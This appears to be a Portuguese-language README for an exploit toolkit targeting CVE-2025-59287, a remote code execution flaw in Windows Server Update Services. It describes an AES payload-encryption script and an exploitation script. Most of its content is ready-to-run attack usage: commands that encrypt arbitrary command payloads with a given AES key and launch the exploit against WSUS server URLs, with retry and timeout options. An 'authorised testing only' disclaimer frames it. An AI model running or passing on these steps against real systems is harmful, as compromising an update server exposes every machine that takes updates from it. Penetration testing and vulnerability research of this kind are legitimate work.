
Kit de exploração para CVE-2025-59287, uma vulnerabilidade de RCE em WSUS, com criptografia de payload AES e uma cadeia de exploração completa para testes de penetração autorizados.
CVE-2025-59287 - Kit de Exploração WSUS
por adel-h4x0a
⚠️ Apenas para Fins Educacionais e Testes Autorizados ⚠️
Visão Geral
Este kit de ferramentas demonstra a exploração da CVE-2025-59287, uma vulnerabilidade de execução remota de código no Windows Server Update Services (WSUS).
Componentes
· Criptografia de payload AES para comunicação WSUS · Suporte para modos de criptografia legado e segura · Geração de payload personalizada
· Cadeia de exploração completa para CVE-2025-59287 · Tratamento robusto de erros e lógica de repetição · Suporte a payload personalizado
Estrutura
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
Uso
Pré-requisitos
pip install -r requirements.txt
Criptografia
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
Exploração
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
Opções
Módulo de Criptografia (cve-2025-59287-encr.py)
· --key: Chave AES em formato hexadecimal (opcional)
· --command: Comando a executar (padrão: calc)
· --mode: Modo de criptografia [legacy, secure] (padrão: legacy)
· --output: Arquivo de saída para salvar o payload (opcional)
Módulo de Exploração (cve-2025-59287-exp.py)
· target: URL do servidor WSUS (obrigatório) · --payload: Arquivo de payload base64 personalizado (opcional) · --timeout: Tempo limite de requisição em segundos (padrão: 30) · --retries: Número de tentativas de repetição (padrão: 3) · --no-banner: Suprimir exibição do banner (opcional)
Exemplo Completo
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
Aviso Legal
❗ Aviso Importante:
Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados. O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.
Esta ferramenta deve ser usada apenas em:
· Ambientes de teste que você possui · Sistemas para os quais você obteve permissão por escrito para testar · Fins educacionais e acadêmicos
O desenvolvedor não se responsabiliza por qualquer uso ilegal ou não autorizado desta ferramenta.
Licença
Este projeto está licenciado sob a Licença MIT.
Atualizações
· v1.0: Lançamento inicial com suporte completo de exploração · v1.1: Tratamento de erros aprimorado e melhorias de registro
Contribuição
Relatórios de bugs e pull requests são incentivados para melhorar a ferramenta dentro do quadro de uso responsável e ético.
Nota: Sempre obtenha permissão por escrito antes de testar qualquer sistema. A conscientização em segurança começa com responsabilidade. 🔒